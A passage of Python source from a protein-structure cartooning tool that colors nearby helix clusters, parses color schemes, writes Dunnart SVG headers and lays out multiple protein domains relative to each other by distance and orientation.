default_shading_color = \
get_color_list(helix_cluster_shading_color)[0] +\
DUNNART_CLUSTER_ALPHA_HEX
cluster_fill_colors.insert(0, default_shading_color)
color_num = 1 # NB start at 1 not 0; 0 used to mark non-assigned cluster
self.helix_cluster_list[0].color_num = color_num
self.helix_cluster_list[0].color = cluster_fill_colors[color_num]
# for every existing helix cluster, find the nearest helix to
# any helix in the cluster. If it is below the distance threshold,
# then make the cluster that helix is in the same color. If it is
# not in a cluster then make it a cluster and color it the same color
# FIXME: this is being done very inefficiently, constructing lots
# of sets from list of all helices and using set difference, should
# build one set then add/subtract things from it.
HELIX_CLUSTER_NEARBY_THRESHOLD = 7.0 # Angstroms. FIXME: adaptive?
cluster_list = list(self.helix_cluster_list) # NB a copy not reference
# What about transitivity? This way cluster 2
# might be near cluster 1, so same color, then cluster
# 3 near 2, also same color, but might not be near cluster
# 1 at all, but ends up same color as it (via 2).
# We resolve this by insisting all clusters are
# pairwise 'close'.
# TODO: FIXME: this is not so good either, as the result depends
# on order things are processed in. E.g (7API) have cluster of helices
# B,C,D then look at E it is close, then A, but it is not close to E
# so not in group.
# But for 1SNG, A gets processed before E so get A in group with B,C,D
# and not E.
# In both cases, A and E are close to B,C,D cluster but not to
# each other. What should be done?
# XXXX 15Feb2008 - greedy algorithm of
# sorting nearby clusters by distance and using
# closest first now implemented, not sure it is what we want though
# e.g 1SNG now getting helix H close not E, 7API gets A and E.
# We'll call the set of clusters that are the same color a 'group'
group_dict = {} # dict of { color_num : list of PTSVGCluster }
grouped_clusters = Set() # Set of PTSVGCluster that are in some group
for helixcluster in cluster_list:
if helixcluster in grouped_clusters:
continue # this cluster already in a group, skip it
cluster_helix_set = Set(helixcluster.svgnodelist)
other_helix_set = Set(list(self.iter_helices())) \
- cluster_helix_set
close_list = self.distmatrix.find_nearby_sses_in_sets(
cluster_helix_set, other_helix_set,
HELIX_CLUSTER_NEARBY_THRESHOLD) # returns (dist, helix) tuples
close_list.sort() # sort by distance (ascending)
if verbose:
sys.stderr.write('set_helix_cluster_colors: helices ' +
str([str(helix) for (dist, helix) in close_list]) +
' are close to helix cluster ' +
helixcluster.clusterid + ' (' +
str([str(helix) for helix in cluster_helix_set]) +
')\n')
for (dist, nearby_helix) in close_list:
if nearby_helix.get_cluster_id() != None:
nearby_cluster = \
self.helix_cluster_dict[nearby_helix.get_cluster_id()]
if verbose:
sys.stderr.write(' nearby helix ' +
str(nearby_helix) +
' is in cluster ' +
nearby_cluster.clusterid + '\n')
else:
# not in a cluster, make one just for this helix
helix_cluster_id = self.helix_cluster_id_generator.next()
nearby_cluster = PTSVGCluster([nearby_helix],
self.xmlid_generator.next(),
str(helix_cluster_id))
nearby_helix.set_cluster_id(helix_cluster_id)
self.helix_cluster_list.append(nearby_cluster)
self.helix_cluster_dict[helix_cluster_id] = nearby_cluster
if verbose:
sys.stderr.write(' clusters ' +
helixcluster.clusterid +
' and single helix ' +
str(nearby_helix) +
' (now cluster ' +
str(helix_cluster_id ) +
') ' +
' are close\n')
assert(nearby_cluster != helixcluster)
if ( not group_dict.has_key(color_num) or
len(group_dict[color_num]) < 2 ):
all_close = True
else:
all_close = True
test_helix_set = Set(nearby_cluster.svgnodelist)
for ref_cluster in group_dict[color_num]:
ref_helix_set = Set(ref_cluster.svgnodelist)
(ref_elt, test_elt, dist) = \
self.distmatrix.find_nearest_sses_in_sets(
ref_helix_set, test_helix_set)
if dist >= HELIX_CLUSTER_NEARBY_THRESHOLD:
all_close = False
if verbose:
sys.stderr.write(' cluster ' +
nearby_cluster.clusterid +
' is not close to cluster ' +
str(ref_elt.get_cluster_id()) +
'; not adding to group\n')
break
if all_close:
if nearby_cluster.color_num == 0:
thiscolornum = helixcluster.color_num
nearby_cluster.color_num = thiscolornum
nearby_cluster.color = cluster_fill_colors[thiscolornum]
else:
thiscolornum = nearby_cluster.color_num
if not group_dict.has_key(thiscolornum):
group_dict[thiscolornum]=[helixcluster, nearby_cluster]
grouped_clusters.add(nearby_cluster)
grouped_clusters.add(helixcluster)
else:
group_dict[thiscolornum].append(nearby_cluster)
grouped_clusters.add(nearby_cluster)
if verbose:
sys.stderr.write(' clusters ' +
helixcluster.clusterid +
' and ' +
nearby_cluster.clusterid +
' are close, colored with ' +
'color number ' + str(thiscolornum) +
'\n')
color_num += 1
# now remove all single-helix clusters that are not in any group
# They are all added by this subroutine so at end of cluster_list
if verbose:
sys.stderr.write(str([str(c) for c in self.helix_cluster_list])
+ '\n')
i = len(self.helix_cluster_list) - 1
while i > 0 and len(self.helix_cluster_list[i].svgnodelist) == 1:
if (self.helix_cluster_list[i].color_num == 0):
removed_cluster = self.helix_cluster_list.pop(i)
if verbose:
sys.stderr.write(' helix ' +
str(removed_cluster.svgnodelist[0]) +
' (cluster ' +
removed_cluster.clusterid + ')' +
' not in any group so no longer a cluster\n')
i -= 1
##########################################################################
#
# functions that operate on PTSVGNodes xpos,ypos etc. having
# already been build to build_dunnart_svg()
#
def get_bounding_box(self):
"""
Get a bounding box for the cartoon based on all the SVG nodes
generated already by build_dunnart_svg().
Parameters:
None
Return value:
Tuple of tuples ((x1, y1), (x2, y2)) where (x1,y1) is the top
left corner of the bounding box and (x2,y2) is the bottom right
corner of the bounding box.
"""
x1 = y1 = sys.maxint
x2 = y2 = -sys.maxint - 1
for node in self.iter_nodes():
if node.get_is_positioned():
if node.xpos - node.width < x1:
x1 = node.xpos - node.width
if node.xpos + node.width > x2:
x2 = node.xpos + node.width
if node.ypos - node.height < y1:
y1 = node.ypos - node.height
if node.ypos + node.height > y2:
y2 = node.ypos + node.height
return ((x1, y1), (x2,y2))
def scale(self, scale_factor):
"""
Scale the cartoon by uniform scaling. Can be used as primitive
way of ensuring no overlaps.
Parameters:
scale_factor - factor to multiply all coordinates by
Return value:
None
Updates xpos,ypos in all SVGNodes in the nodelist.
"""
for node in self.iter_nodes():
if node.get_is_positioned():
node.xpos *= scale_factor
node.ypos *= scale_factor
def translate_relative_bbox(self, bounding_box, relpos):
"""
Translate the cartoon to a position ABOVE, BELOW, LEFT or RIGHT of
the supplied bounding_box (specified by tuple of
top-left and bottom-right
(x,y) tuples). Leaves an additional gap of DUNNART_DOMAIN_GAP_SIZE.
Parameters:
bounding_box - Tuple of tuples ((x1, y1), (x2, y2)) where
(x1,y1) is the top
left corner of the bounding box and (x2,y2) is
the bottom right corner of the bounding box.
relpos - ptrelpos.py RELPOS_ABOVE/BELOW/LEFT/RIGHT to position
relative to the bounding box,
or None to move it to the same position as the bounding box.
Return value:
None.
Updates xpos,ypos in all SVGNodes int the nodelist.
Note must also update x/y for indguides and distribution handles
Raises exceptions:
ValueError for bad relpos value
"""
(x1, y1) = bounding_box[0]
(x2, y2) = bounding_box[1]
this_bounding_box = self.get_bounding_box()
(this_x1, this_y1) = this_bounding_box[0]
(this_x2, this_y2) = this_bounding_box[1]
xshift = 0
yshift = 0
if relpos == None:
xshift = -(this_x1 - x1)
yshift = -(this_y1 - y1)
elif relpos == RELPOS_ABOVE:
yshift = -(abs(this_y2 - y1) + DUNNART_DOMAIN_GAP_SIZE)
elif relpos == RELPOS_BELOW:
yshift = abs(y2 - this_y1) + DUNNART_DOMAIN_GAP_SIZE
elif relpos == RELPOS_LEFT:
xshift = -(abs(this_x2 - x1) + DUNNART_DOMAIN_GAP_SIZE)
elif relpos == RELPOS_RIGHT:
xshift = abs(x2 - this_x1) + DUNNART_DOMAIN_GAP_SIZE
else:
raise ValueError('bad relpos value ' + str(relpos))
# move shapes
for node in self.iter_nodes():
if node.get_is_positioned():
if relpos == None:
node.ypos += yshift
node.xpos += xshift
elif relpos == RELPOS_ABOVE or relpos == RELPOS_BELOW:
node.ypos += yshift
elif relpos == RELPOS_LEFT or relpos == RELPOS_RIGHT:
node.xpos += xshift
else:
raise ValueError('bad relpos value ' + str(relpos))
# move indguides and handles
for svgconstraint in self.svg_constraint_list:
svgconstraint.translate(xshift, yshift)
def write_dunnart_svg(self, fh):
"""
Write the SVG to the supplied file using the SVG nodes built by
build_dunnart_svg()
Parameters:
fh - filehandle open for writing, to write SVG to.
Return value:
None
"""
#
# write the SVG to the file
#
# write out the svg that has been built for each node
for node in self.iter_nodes():
if node.get_is_positioned(): # e.g. 3_10, pi helices may not be
node.write_svg(fh)
# write out the cluster constraints (for sheets and helix clusters)
for cluster in self.sheet_cluster_list + self.helix_cluster_list:
cluster.write_svg(fh)
# write out the alignment and distribution constraints
for svgconstraint in self.svg_constraint_list:
svgconstraint.write_svg(fh)
# write out the connectors
for connector in self.svg_connector_list:
connector.write_svg(fh)
##########################################################################
#-----------------------------------------------------------------------------
#
# Function definitions
#
#-----------------------------------------------------------------------------
def get_simple_colors(color_scheme):
"""
Return the rgb color tuples for the colors specified for the 'simple'
color scheme, which is in the format
'simple:sheet=<sheet_colors>.helixcluster=<helixcluster_color>.alpha=<helix_alpha_colors>.pi=<helix_pi_colors>.310=<helix_310_colors>.terminus=<terminus_colors>
colors strands in sheets
the sheet_color, helices in helix clusters
(if any) the helixcluster_color, helices the helix_color.
the color lists are comma-delimited lists of recognized color names
or RGB colors in hex (e.g. sheet=red,purple,#ddf02d).
This format is assumed to have already been validated by the parameter
parsing in main(), by regular expression (but we check for duplicate
type names here as that is simpler than in regexp - also for valid
colors; this functino is called as part of command line validation).
Parameters:
color_scheme: string starting 'simple:' as specfied above
Return value:
dict { type : color_list } where type is 'sheet','helixcluster',
'alpha','pi' or '310' and color_list is list of color value strings
where the color value strings are 'rrggbb' color
hex strings (note no '#')
Raises Excpetions:
KeyError for unknown color names
ValueError for dupplicate type names
"""
type_color_dict = {}
if color_scheme[:7] != "simple:":
return None # should be validated before entering this function
type_eq_value_list = color_scheme[7:].split('.')
for type_eq_value in type_eq_value_list:
type_value = type_eq_value.split('=')
typestr = type_value[0]
if type_color_dict.has_key(typestr):
raise ValueError("duplicate type " + typestr)
color_list_str = type_value[1]
color_list = get_color_list(color_list_str)
type_color_dict[typestr] = color_list
if verbose:
sys.stderr.write('"simple" color scheme: ' + str(type_color_dict) + '\n')
return type_color_dict
def get_connector_colors(connector_color_scheme):
"""
Return the RGB color tuples for the colors specified in the
connector_color_scheme, which is in one of the formats:
'all[:<color>]'
'chain[:<color_list>]'
'domain[:<intra_color>,<inter_color>]'
'crossing[:<color_list>]'
The color lists are comma-delimited lists of recognized color names
or RGB colors in hex (e.g. red,purple,#ddf02d).
It is assumed that this function is only called when a color or color_list
acutally is present (i.e. string contains ':' followed by color(s)
and format has already been validated by paramering parsing (by regexp
in main()).
Parameters:
connector_color_scheme - as specified above
Return value:
list of color value strings (may have length 1 e.g. for 'all')
where the color value strings are 'rrggbbaa' color hex strings (no '#')
where the alpha channel value aa is always 'ff'
Uses globals (Readonly):
COLOR_DICT (color.py) - maps color names to RGB hex strings
Raises Excpetions:
KeyError for unknown color names
"""
splitstr = connector_color_scheme.split(':')
scheme = splitstr[0]
color_list_str = splitstr[1]
color_str_list = color_list_str.split(',')
color_list = [ color + 'ff' for color in get_color_list(color_list_str) ]
return color_list
def get_line_color(connector_color_scheme, chain_i):
"""
Utility function used to get connector color based on the user-specified
color scheme
Parmameters:
connector_color_scheme -string as speicfied in get_connector_colors
chain_i - index number of current chain
Return value:
color for this connector in this chain_i
"""
# line color may be overwritten later for multidomain
if connector_color_scheme[:5] == 'chain':
if ':' in connector_color_scheme: # color list specified
line_colors=get_connector_colors(connector_color_scheme)
linecolor = line_colors[chain_i % len(line_colors)]
else: # use builtin default list
linecolor = DUNNART_LINE_COLORS[chain_i % \
len(DUNNART_LINE_COLORS)]
elif connector_color_scheme[:3]=='all':
if ':' in connector_color_scheme: # color list specified
linecolor=get_connector_colors(connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
elif connector_color_scheme[:6] == 'domain':
if ':' in connector_color_scheme:
linecolor = get_connector_colors(connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
else: # "crossing" is handled in Dunnart not here, but use first color in
# list for all connectors, crossings to be resolved in Dunnart.
if ':' in connector_color_scheme: # color list specified
linecolor=get_connector_colors(connector_color_scheme)[0]
else:
linecolor = DUNNART_DEFAULT_LINE_COLOR
return linecolor
def write_dunnart_svg_prelude(fh, identifier,
pdbid,
num_domains, total_num_domains,
color_interfering_connectors=False,
connector_color_scheme = None,
use_auto_graph_layout=False):
"""
Write the XML prelude information for the SVG.
Parameters:
fh - filehandle open for writing, to write SVG to.
identifier - string identifier (PDB id, etc) to put in comments
pdbid - PDB id
num_domains - the number of protein domains represneted by this file
total_num_domains - number of domains identified in protein
color_intefering_connectors - If True, set flags in SVG to tell
Dunnart to color crossing and shared path
connectors different colors.
Default False.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
use_auto_graph_layout - If True, set flags in SVG to tell Dunnart
to use automatic graph layout.
Default False.
Return value:
None.
"""
fh.write('<?xml version="1.0" encoding="UTF-8"?>\n')
timestamp = strftime("%d%b%Y %H:%M:%S", localtime())
fh.write("<!-- " + identifier + " -->\n")
fh.write("<!-- " + str(num_domains) + " of " + str(total_num_domains) +
" domain(s) -->\n")
fh.write("<!-- Generated on " + timestamp
+ " by ptgraph2 " + '\n'
+ get_version() + '\n'
+ " ".join(sys.argv) + " -->\n")
fh.write('<!-- http://munk.csse.unimelb.edu.au/pro-origami -->\n')
fh.write('<!-- for use with Dunnart (http://www.csse.monash.edu.au/~mwybrow/dunnart/) -->\n')
fh.write('<svg ' +
'xmlns:dunnart="http://www.csse.monash.edu.au/~mwybrow/dunnart.dtd" ' +
'xmlns:' + PTGRAPH_NS +
'="http://www.csse.unimelb.edu.au/~astivala/proorigami.dtd"' +
'>\n')
# Also write this useful information in XML to be preserved by Dunnart
# so it stays in final version
fh.write('<' + PTGRAPH_NS + ':identification ' + 'pdbId="' + pdbid + '" ' +
'outputFilename="' + identifier + '" ' +
'numberOfDomains="' + str(num_domains) + '" ' +
'totalDomains="' + str(total_num_domains) + '" ' +
'creationTime="' + timestamp + '" ' +
'program="' + 'ptgraph2' + '" ' +
'version="' + get_version() + '" ' +
'commandLine="' + " ".join(sys.argv) + '" ' +
'/>\n')
connector_colors_str = ""
if color_interfering_connectors:
color_conn_str = "1"
if (connector_color_scheme and connector_color_scheme[:9]=="crossing:"):
connector_colors = get_color_list(connector_color_scheme[9:])
connector_colors_str = ' interferingConnectorColours="' + \
reduce(lambda a,b : a + ',' + b, connector_colors) +\
'" '
else:
color_conn_str = "0"
if use_auto_graph_layout:
# FIXME - using this is probably not a good idea, should probably remove
fh.write(' <dunnart:options automaticGraphLayout="1" nonOverlapConstraints="1" pageBoundaryConstraints="1" penaliseCrossings="1" avoidBuffer="8" colourInterferingConnectors="' + color_conn_str + '"' +
connector_colors_str + '/>\n')
else:
fh.write(' <dunnart:options automaticGraphLayout="0" nonOverlapConstraints="1" penaliseCrossings="1" avoidBuffer="10" routingBuffer="4" colourInterferingConnectors="' + color_conn_str + '"' + connector_colors_str + '/>\n')
def write_dunnart_svg_conclusion(fh):
"""
Write the XML prelude information for the SVG.
Parameters:
fh - filehandle open for writing, to write SVG to.
Return value:
None.
"""
fh.write('</svg>\n')
def find_largest_domain(ptg_list):
"""
Return the 'largest' domain in the list of PTGraph2 objects (each one
representing one domain). 'Largest' is defined as the one with the
largest sheet (as defined by PTGraph2.largest_sheet()). If there is
no PTGraph2 with a sheet, use the one with the largest helix.
There are some alternative definitions of 'largest' that also make
sense, such as the one with the most SSEs, or with the most residues,
but we choose this one as on the diagram (and in 3D), the largest sheet is
what we tend to see as 'central' and orient everything around, which
is what we want here. Note if we choose 'most SSEs' as 'largest', may
end up with a domain with many small helices as largets, which would
probably not be desirable, and 'most residues' may give a domain with
large helices as largest, while we probably would prefer a sheet
to be the 'largest' element, so that's why it is this way.
Parameters:
ptg_list - list of PTGraph2 objects
Return value:
The PTGraph2 object that is largest according to above definition.
"""
max_sheet_size = 0
largest_ptg = None
for ptg in ptg_list:
largest_sheet_id = ptg.largest_sheet()
if largest_sheet_id != None:
sheet_size = ptg.sheet_size(largest_sheet_id)
if sheet_size > max_sheet_size:
max_sheet_size = sheet_size
largest_ptg = ptg
if largest_ptg == None: # no largest sheet, use helices instead
max_helix_size = 0
for ptg in ptg_list:
largest_helix = ptg.largest_helix()
if largest_helix.get_span() > max_helix_size:
max_helix_size = largest_helix.get_span()
largest_ptg = ptg
return largest_ptg
def domain_domain_distance(ptg1, ptg2, pdb_struct, domain_distance_dict):
"""
Return the distance between two domains, which will be defined as
the distance between their two closest SSEs
(using SSE distnace defined in ptdistmatrix.py)
Parameters:
ptg1 - PTGraph2 object for one domain
ptg2 - PTGraph2 object for the other domain
pdb_struct - parsed PDB structure from Bio.PDB
domain_distance_dict (In/Out) - dict { (dom1, dom2) : ret_tuple }
for memoizing domiain-domain distances. (dom1,dom2)
is tuple of two PTGraph2 objects, note both (dom1,dom2)
and (dom2,dom1) are always added
and ret_tuple is the return value tuple as defined below.
Return value:
tuple (dist, closest_sse1, closest_sse2, closest_res1, closest_res2)
distance in Angstroms between the two domains, as defined above and
closest_sse1, closest_sse2 are PTNode objects for the closest
SSEs in ptg1 and ptg2 domains respectively and
closest_res1 and closest_res2 are the closest residues in
closest_sse1 and closest_sse2 respectively.
"""
# This function is memoized by the domain_distance_dict parmeter,
# to save recomputations of distances that are previously computed.
if domain_distance_dict.has_key((ptg1, ptg2)):
return domain_distance_dict[(ptg1, ptg2)]
min_dist = float("inf")
closest_sse1 = closest_sse2 = None
closest_res1 = closest_res2 = None
# exclude the terminus nodes
ptg1_sses = [ node for node in ptg1.iter_nodes()
if not isinstance(node, PTNodeTerminus) ]
ptg2_sses = [ node for node in ptg2.iter_nodes()
if not isinstance(node, PTNodeTerminus) ]
for sse1 in ptg1_sses:
for sse2 in ptg2_sses:
(dist, res1, res2) = calc_sse_sse_dist(sse1, sse2, pdb_struct)
if dist < min_dist:
min_dist = dist
closest_sse1 = sse1
closest_sse2 = sse2
closest_res1 = res1
closest_res2 = res2
ret_tuple12 = (min_dist,closest_sse1,closest_sse2,closest_res1,closest_res2)
ret_tuple21 = (min_dist,closest_sse2,closest_sse1,closest_res2,closest_res1)
domain_distance_dict[(ptg1, ptg2)] = ret_tuple12
domain_distance_dict[(ptg2, ptg1)] = ret_tuple21
# if verbose:
# sys.stderr.write('dist between domain ' + ptg1.domainid + ' and ' +
# ptg2.domainid + ' is ' + str(min_dist) + '\n')
return ret_tuple12
def domain_domain_orientation(ptg1, ptg2, pdb_struct):
"""
Return the orientation (tableau code - see pttableau.py) between two
domains. This is defined to be the orientation between the longest
strands in the largest sheets of the two domains (or longest helix
if no sheet).
Parameters:
ptg1 - PTGraph2 object for one domain
ptg2 - PTGraph2 object for the other domain
pdb_struct - parsed PDB structure from Bio.PDB
Return value:
tuple (tabcode, sse1, sse2) where tabcode
two-character tableau code (see pttableau.py) of orientatino between
the two domains and sse1 and sse2 are SSEs used for orientatino
in ptg1 and pgt2 respectively
"""
sse1 = ptg1.get_orientation_sse()
sse2 = ptg2.get_orientation_sse()
angle = sse1.relative_angle(sse2, pdb_struct)
tabcode = pttableau.angle_to_tabcode(angle)
if verbose:
sys.stderr.write('orientation domain ' + ptg1.domainid + ',' +
ptg2.domainid + '; ' +
' ' + str(sse1) + ',' + str(sse2) + ': ' +
tabcode + '\n')
return (tabcode, sse1, sse2)
def find_nearest_domain(domain_set1, domain_set2, pdb_struct,
domain_distance_dict):
"""
From the PTGraph2 objects in domain_set2, find the one that is
nearest to any of the PTGraph2 objects in domain_set1.
Parameters:
domain_set1 - set of PTGraph2 objects to find nearest to
domain_set2 - set of PTGraph2 objects to find the nearest to any in
domain_set1
pdb_struct - parsed PDB structure from Bio.PDB
domain_distance_dict (In/Out) - dict { (dom1, dom2) : dd_tuple }
for memoizing domiain-domain distances. (dom1,dom2)
is tuple of two PTGraph2 objects, note both (dom1,dom2)
and (dom2,dom1) are always added, they are the same.
Return value:
tuple (domain1, domain2, dist_tuple)
where domain1 is from domain_set1 and
domain2 is from domain_set2 and the distance between the two
is the smallest distance between any pair (a,b) with a in domain_set1
and b inn domain_set2
and dist_tuple is the (dist,sse1,sse2,res1,res2) tuple as defined
by the return value of domain_domain_distance()
"""
min_dist = float("inf")
closest_domain1 = closest_domain2 = None
closest_dd_tuple = None
for domain1 in domain_set1:
for domain2 in domain_set2:
dd_dist_tuple = domain_domain_distance(domain1, domain2,
pdb_struct,
domain_distance_dict)
dist = dd_dist_tuple[0]
if (dist < min_dist):
min_dist = dist
closest_domain1 = domain1
closest_domain2 = domain2
closest_dd_tuple = dd_dist_tuple
return (closest_domain1, closest_domain2, closest_dd_tuple)
def get_domain_relpos(posdom_sse, curdom_sse,
nearest_ref_resnum, nearest_test_resnum,
tabcode,
positioned_domain, current_domain):
"""
Get the relative position of current_domain relative to positioned_domain
for layout on multidomain cartoon
Parameters:
posdom_sse - PTNode of SSE in positioned domain for placement relative to
curdom_sse - PTNode of SSE in current domain to place relative to posdom
nearest_ref_resnum - residue number in reference SSE that test
element is closest to
nearest_test_resnum - residue number in test SSE that is closest
to reference element
tabcode - two character tableau code for orientatino of the two domains
positioned_domain - PTGraph2 of the domain to place curdom relative to
current_domain - PTGraph2 of the domain to place relative to posdom
Return value:
RELPOS_ABOVE/BELOW/etc. for placing current domain relative to
positioned domain.
"""
if isinstance(posdom_sse, PTNodeStrand):
ref_element = posdom_sse.get_sheet_id()
ref_strand = posdom_sse
else:
ref_element = posdom_sse
ref_strand = None
if isinstance(curdom_sse, PTNodeStrand):
test_element = curdom_sse.get_sheet_id()
test_strand = curdom_sse
else:
test_element = curdom_sse
test_strand = None
relpos = positioned_domain.ptrelpos.get_external_relpos(
ref_element,
test_element,
ref_strand,
test_strand,
nearest_ref_resnum,
nearest_test_resnum,
tabcode,
current_domain.sheet_strandlists_dict)
return relpos
def write_dunnart_svg_domains(outfilehandle, outfilename,
ptg_list, pdb_struct,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
interdomain_connectors,
use_scaling,
label_residue_numbers):
"""
Given a list of PTGraph2 objects, one per domain, write them all
to a single SVG file so they are positioned in some sensbile way
relative to each other on a single cartoon.
We use a greedy algorithm similar to that used
in positioning sheets etc. in each cartoon, i.e.
1. Position the largest domain.
2. Use the distance map to find closest domain to any already
placed domain
3. position that closest domain relative to the chosen already
placed one, using distance/position maps and tableaux to determine
relative position and orientation
4. repeat from 2 until all domains placed
Note that several fields in PTSVGNodes that are built in eacdh
domain independently are overwritten afterwards by this function
or things it calls for multidomains. These include the xpos and ypos
(moving the domainds on the page), helix and strand labels
(since these are numbered from 1 in each domain, and we may have
to change them to be sequnetial along chains across domains),
helix and strand colors (similarly, color gradient may now go
across domains) and connector colors (for connectors colored by chain,
chains now going across domains).
Parameters:
outfilehandle - open filehandle to write SVG to
outfilename - filename (just for verbose messages)
ptg_list - list of PTGraph2 objects, one per domain
pdb_struct - parsed PDB structure from Bio.PDB
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes (not available to
be used with GraphViz either).
use_connector_arrowheads - If True write arrowheads on connectors
indicating sequence direction from N- to C- terminus.
Only used for Dunnart.
heuristic_helix_placement - use the original heuristic helix placement
instead of trying to place helices according to distance
matrix information.
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
enable_sheet_gap_rule - If True and using herusistic helix placement,
don't put 'too long' helices between sheets that are
neighbours.
use_helix_clustering - If True and using heuristic helix placement,
cluster sequential helices and place in cluster
with tableau and distance matrix rather than
aligning them all on strand axis.
helix_cluster_shading_color - color to shade helix clusters
connector_color_scheme - 'all','chain','domain','crossing' (see main)
color_scheme - 'none', 'simple', 'gradient', 'sheet', 'fold' (see main)
helix_proximity_shading_colors - If not None & using helix clustering,
shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
interdomain_connectors - make connectors between domains rather
than using pseudo-terminus nodes as normally used
(such as when one domain per file).
use_scaling - if True, use scaling as primitve way to avoid overlaps
before dunnart processing to help avoid crashes in dunnart
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Return value:
None
"""
initial_xmlid = 1 #start XML identifiers at 1
# store above,below,left,right neighbour domain of each domain, so we
# can avoid collisions
domain_posmap = PTPosMap()
# dict { (dom1, dom2) : dist_tuple }
# for memoizing domiain-domain distances. (dom1,dom2)
# is tuple of two PTGraph2 objects, note both (dom1,dom2)
# and (dom2,dom1) are always added, they are the same.
# dist_tuple is defined by return value of domain_domain_distance()
domain_distance_dict = {}
# build svg for the largest domain as starting point
largest_domain = find_largest_domain(ptg_list)
current_domain = largest_domain
build_one_dunnart_svg_domain(largest_domain, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
False, # main_sideways
False, # main_reversed
interdomain_connectors,
use_scaling,
label_residue_numbers)
# ensure all XML identifiers are distinct across domains
initial_xmlid = largest_domain.xmlid_generator.next()
# build set of positioned and unpositioned domains.
positioned_domains = Set([largest_domain])
unpositioned_domains = Set(ptg_list) - positioned_domains
while len(unpositioned_domains) > 0:
(positioned_domain, current_domain, dd_tuple) = \
find_nearest_domain(positioned_domains,
unpositioned_domains,
pdb_struct,
domain_distance_dict)
# (dist, posdom_sse, curdom_sse, posdom_res, curdom_res) = dd_tuple
if verbose:
sys.stderr.write('positioning domain ' + current_domain.domainid +
' relative to domain ' + positioned_domain.domainid
+ '\n')
# sys.stderr.write(' ref is ' + str(posdom_sse) + ', test is ' +
# str(curdom_sse) + '\n')
(tabcode, sse1, sse2) = domain_domain_orientation(positioned_domain,
current_domain,
pdb_struct)
# Use orientation SSEs for relative position as well
posdom_sse = sse1
curdom_sse = sse2
(dist, posdom_res, curdom_res) = calc_sse_sse_dist(posdom_sse,
curdom_sse,
pdb_struct)
(main_sideways, main_reversed) = resolve_orientation(
tabcode, sse1, sse2)
posdom_resnum = biopdbresid_to_pdbresseq(posdom_res.get_id())
curdom_resnum = biopdbresid_to_pdbresseq(curdom_res.get_id())
relpos = get_domain_relpos(posdom_sse, curdom_sse,
posdom_resnum, curdom_resnum,
tabcode,
positioned_domain, current_domain)
if verbose:
sys.stderr.write('positioning domain ' +
current_domain.domainid +
' ' + ptrelpos_to_str(relpos) +
' ' + positioned_domain.domainid +
'\n')
# avoid collisoins between domains by checking in posmap and
# positioning relative to the domain we would have collided with
# instead
if domain_posmap.has_key(positioned_domain):
domain_neighbours = domain_posmap[positioned_domain]
neighbour = domain_neighbours.get_neighbour(relpos)
if neighbour != None:
if verbose:
sys.stderr.write(' domain position: cannot place domain ' +
current_domain.domainid + ' ' +
ptrelpos_to_str(relpos) + ' ' +
positioned_domain.domainid +
' (occupied by ' +
neighbour.domainid + ')\n')
positioned_domain = neighbour
if verbose:
sys.stderr.write(' positioning domain ' +
current_domain.domainid +
' relative to domain ' +
positioned_domain.domainid
+ '\n')
(tabcode, sse1, sse2) = \
domain_domain_orientation(positioned_domain,
current_domain,
pdb_struct)
# Use orientation SSEs for relative position as well
posdom_sse = sse1
curdom_sse = sse2
(dist, posdom_res, curdom_res) = calc_sse_sse_dist(posdom_sse,
curdom_sse,
pdb_struct)
(main_sideways, main_reversed) = \
resolve_orientation(tabcode, sse1, sse2)
posdom_resnum = biopdbresid_to_pdbresseq(posdom_res.get_id())
curdom_resnum = biopdbresid_to_pdbresseq(curdom_res.get_id())
relpos = get_domain_relpos(posdom_sse, curdom_sse,
posdom_resnum, curdom_resnum,
tabcode,
positioned_domain, current_domain)
domain_neighbours = domain_posmap[positioned_domain]
neighbour = domain_neighbours.get_neighbour(relpos)
if neighbour != None:
# still a collision.
# FIXME: arbitrary domain positioning here
if (domain_neighbours.west == None):
relpos = RELPOS_LEFT
elif (domain_neighbours.east == None):
relpos = RELPOS_RIGHT
elif (domain_neighbours.north == None):
relpos = RELPOS_ABOVE
elif (domain_neighbours.south == None):
relpos = RELPOS_BELOW
else:
sys.stderr.write('WARNING: nowhere to'+
' place domain ' +
current_domain.domainid +
' relative to domain ' +
positioned_domain.domainid +
'\n')
if verbose:
sys.stderr.write(' (collision): ' +
'positioning domain ' +
current_domain.domainid + ' ' +
ptrelpos_to_str(relpos) +
' domain ' +
positioned_domain.domainid +
'\n')
# Build SVG objects with graph and constraints for Dunnart
build_one_dunnart_svg_domain(current_domain, outfilename,
sse_label_scheme,
use_connector_arrowheads,
heuristic_helix_placement,
sheet_shading_colors,
enable_sheet_gap_rule,
use_helix_clustering,
helix_cluster_shading_color,
connector_color_scheme,
color_scheme,
helix_proximity_shading_colors,
initial_xmlid,
main_sideways,
main_reversed,
interdomain_connectors,
use_scaling,
label_residue_numbers)
# ensure all XML identifiers are distinct across domains
initial_xmlid = current_domain.xmlid_generator.next()
# to position each domain, we find its relative position to the
# already positioned domain, and translate it so it is outside
# and in the correct relative position to the bounding box of
# the positioned one
positioned_bbox = positioned_domain.get_bounding_box()
# first move the current domain to same position as positioned domain
current_domain.translate_relative_bbox(positioned_bbox, None)
# then move it left/right/up/down relative to the positioned domain
current_domain.translate_relative_bbox(positioned_bbox, relpos)
domain_posmap.add_neighbour_obj(positioned_domain, current_domain,
relpos)
unpositioned_domains.remove(current_domain)
positioned_domains.add(current_domain)
# END while len(unpositioned_domains) > 0
